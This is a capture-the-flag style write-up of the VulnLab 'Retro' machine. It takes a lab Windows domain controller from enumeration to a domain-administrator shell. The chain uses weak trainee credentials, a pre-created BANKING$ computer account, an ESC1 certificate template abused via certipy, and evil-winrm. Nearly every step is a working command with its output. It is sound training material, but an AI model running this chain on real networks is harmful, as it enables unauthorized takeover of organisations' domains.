vulnlab-retro
Let’s start with an Nmap scan.
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ cat ports_retro.txt
# Nmap 7.94SVN scan initiated Mon Jun 3 18:51:15 2024 as: nmap -Pn -sC -sV -oN ports_retro.txt 10.10.95.159
Nmap scan report for 10.10.95.159
Host is up (0.019s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-03 16:51:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-03T16:52:44+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-06-03T16:52:04+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2024-06-02T16:49:49
|_Not valid after: 2024-12-02T16:49:49
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time:
| date: 2024-06-03T16:52:06
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 3 18:52:46 2024 -- 1 IP address (1 host up) scanned in 91.24 seconds
┌──(puck㉿kali)-[~/vulnlab/retro]
.
LDAP enum
➜ retro ldapsearch -x -H ldap://retro.vl -s base namingContexts # extended LDIF # # LDAPv3 # base <> (default) with scope baseObject # filter: (objectclass=*) # requesting: namingContexts # # dn: namingContexts: DC=retro,DC=vl namingContexts: CN=Configuration,DC=retro,DC=vl namingContexts: CN=Schema,CN=Configuration,DC=retro,DC=vl namingContexts: DC=DomainDnsZones,DC=retro,DC=vl namingContexts: DC=ForestDnsZones,DC=retro,DC=vl
try null auth
➜ retro ldapsearch -x -H ldap://retro.vl -s sub -b 'DC=retro,DC=vl' # extended LDIF # # LDAPv3 # base <DC=retro,DC=vl> with scope subtree # filter: (objectclass=*) # requesting: ALL # # search result search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090AC9, comment: In order to perform this opera tion a successful bind must be completed on the connection., data 0, v4f7c # numResponses: 1
auth required
.
SMB
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'guest' -p '' --shares
SMB dc.retro.nl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB dc.retro.nl 445 DC [+] retro.vl\guest:
SMB dc.retro.nl 445 DC [+] Enumerated shares
SMB dc.retro.nl 445 DC Share Permissions Remark
SMB dc.retro.nl 445 DC ----- ----------- ------
SMB dc.retro.nl 445 DC ADMIN$ Remote Admin
SMB dc.retro.nl 445 DC C$ Default share
SMB dc.retro.nl 445 DC IPC$ READ Remote IPC
SMB dc.retro.nl 445 DC NETLOGON Logon server share
SMB dc.retro.nl 445 DC Notes
SMB dc.retro.nl 445 DC SYSVOL Logon server share
SMB dc.retro.nl 445 DC Trainees READ
┌──(puck㉿kali)-[~/vulnlab/retro]
impacket-smbclient guest@retro -no-pass Impacket v0.11.0 - Copyright 2023 Fortra Type help for list of commands # use Trainees # ls drw-rw-rw- 0 Mon Jul 24 00:16:11 2023 . drw-rw-rw- 0 Wed Jul 26 11:54:14 2023 .. -rw-rw-rw- 288 Mon Jul 24 00:16:11 2023 Important.txt
# cat important.txt Dear Trainees, I know that some of you seemed to struggle with remembering strong and unique passwords. So we decided to bundle every one of you up into one account. Stop bothering us. Please. We have other stuff to do than resetting your password every day. Regards The Admins
RID-Brute.
crackmapexec smb retro.vl -u 'guest' -p '' --shares
Simple check user=pass
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee'
SMB dc.retro.nl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB dc.retro.nl 445 DC [+] retro.vl\trainee:trainee
┌──(puck㉿kali)-[~/vulnlab/retro]
SMB check again with creds
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee' --shares
SMB dc.retro.nl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB dc.retro.nl 445 DC [+] retro.vl\trainee:trainee
SMB dc.retro.nl 445 DC [+] Enumerated shares
SMB dc.retro.nl 445 DC Share Permissions Remark
SMB dc.retro.nl 445 DC ----- ----------- ------
SMB dc.retro.nl 445 DC ADMIN$ Remote Admin
SMB dc.retro.nl 445 DC C$ Default share
SMB dc.retro.nl 445 DC IPC$ READ Remote IPC
SMB dc.retro.nl 445 DC NETLOGON READ Logon server share
SMB dc.retro.nl 445 DC Notes READ
SMB dc.retro.nl 445 DC SYSVOL READ Logon server share
SMB dc.retro.nl 445 DC Trainees READ
┌──(puck㉿kali)-[~/vulnlab/retro]
impacket-smbclient trainee:trainee@retro.vl Impacket v0.11.0 - Copyright 2023 Fortra Type help for list of commands # use Notes # ls drw-rw-rw- 0 Mon Jul 24 00:03:16 2023 . drw-rw-rw- 0 Wed Jul 26 11:54:14 2023 .. -rw-rw-rw- 248 Mon Jul 24 00:05:56 2023 ToDo.txt
# cat ToDo.txt Thomas, after convincing the finance department to get rid of their ancienct banking software it is finally time to clean up the mess they made. We should start with the pre created computer account. That one is older than me. Best James
I found a great blog post by TrustedSec explaining how to abuse pre-created computer accounts.
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee' --rid-brute
SMB dc.retro.nl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB dc.retro.nl 445 DC [+] retro.vl\trainee:trainee
SMB dc.retro.nl 445 DC [+] Brute forcing RIDs
SMB dc.retro.nl 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB dc.retro.nl 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB dc.retro.nl 445 DC 501: RETRO\Guest (SidTypeUser)
SMB dc.retro.nl 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB dc.retro.nl 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB dc.retro.nl 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB dc.retro.nl 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB dc.retro.nl 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB dc.retro.nl 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB dc.retro.nl 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB dc.retro.nl 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB dc.retro.nl 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB dc.retro.nl 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB dc.retro.nl 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB dc.retro.nl 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB dc.retro.nl 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB dc.retro.nl 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB dc.retro.nl 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB dc.retro.nl 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB dc.retro.nl 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB dc.retro.nl 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB dc.retro.nl 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB dc.retro.nl 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB dc.retro.nl 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB dc.retro.nl 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB dc.retro.nl 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB dc.retro.nl 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB dc.retro.nl 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB dc.retro.nl 445 DC 1109: RETRO\tblack (SidTypeUser)
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$
pre-created computer accounts with the Assign this computer account as a pre-Windows 2000 computer checkmark, would have the password for the computer account the same as the computer account name in lowercase.
crackmapexec smb retro.vl -u 'BANKING$' -p 'banking' SMB retro.vl 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) SMB retro.vl 445 DC [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT crackmapexec smb retro.vl -u 'BANKING$' -p 'bankings' SMB retro.vl 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) SMB retro.vl 445 DC [-] retro.vl\BANKING$:bankings STATUS_LOGON_FAILURE
To change the computer password we can use impacket-changepasswd script. The article also mentions using RPC over SMB as it results in errors. We can do so with the -p rpc-samr flag.
impacket-changepasswd 'retro.vl/BANKING$':banking@retro.vl -newpass Password12345 -dc-ip 10.10.106.112 -p rpc-samr Impacket v0.11.0 - Copyright 2023 Fortra [*] Changing the password of retro.vl\BANKING$ [*] Connecting to DCE/RPC as retro.vl\BANKING$ [*] Password was changed successfully.
ADCS check
I always 1st sync the system clock with the DC
┌──(puck㉿kali)-[~] └─$ sudo ntpdate retro.vl 2024-06-03 19:23:00.526214 (+0200) -1.338499 +/- 0.011652 retro.vl 10.10.108.116 s1 no-leap CLOCK: time stepped by -1.338499
┌──(puck㉿kali)-[~]
└─$ certipy-ad find -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
look for vulnerable template
➜ retro certipy-ad find -vulnerable -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Property Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
As we can see certipy-ad has flagged one template vulnerable to ESC1.
ESC1 allows us to request a certificate and supply the subject SPN. This is due to the EnrolleeSuppliesSubject flag set. We can use certipy-ad again and request a administrator certificate.
certipy-ad req -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template. [*] Request ID is 16
Unfortunately, this has failed with the CERTSRV_E_KEY_LENGTH which means that the public key does not meet the minimum size required by the specified certificate template. Taking a look back at the certipy output we can see that the RetroClients certificate template requires minimum RSA key length of 4096 Bytes.
Fortunately, certipy-ad allows us to set the RSA key length with the -key-size flag.
certipy-ad req -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 17 [*] Got certificate with UPN 'administrator@retro.vl' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx'
This works, we can now use auth module of certipy to get a valid TGT as administrator.
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.108.116 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@retro.vl [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@retro.vl': *******************************:*******************************
We now own a administrator certificate which we can use to authenticate to the domain controller.
┌──(puck㉿kali)-[~]
└─$ evil-winrm -i retro.vl -u 'Administrator' -H '<REDACTED>'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
DC
That’s all.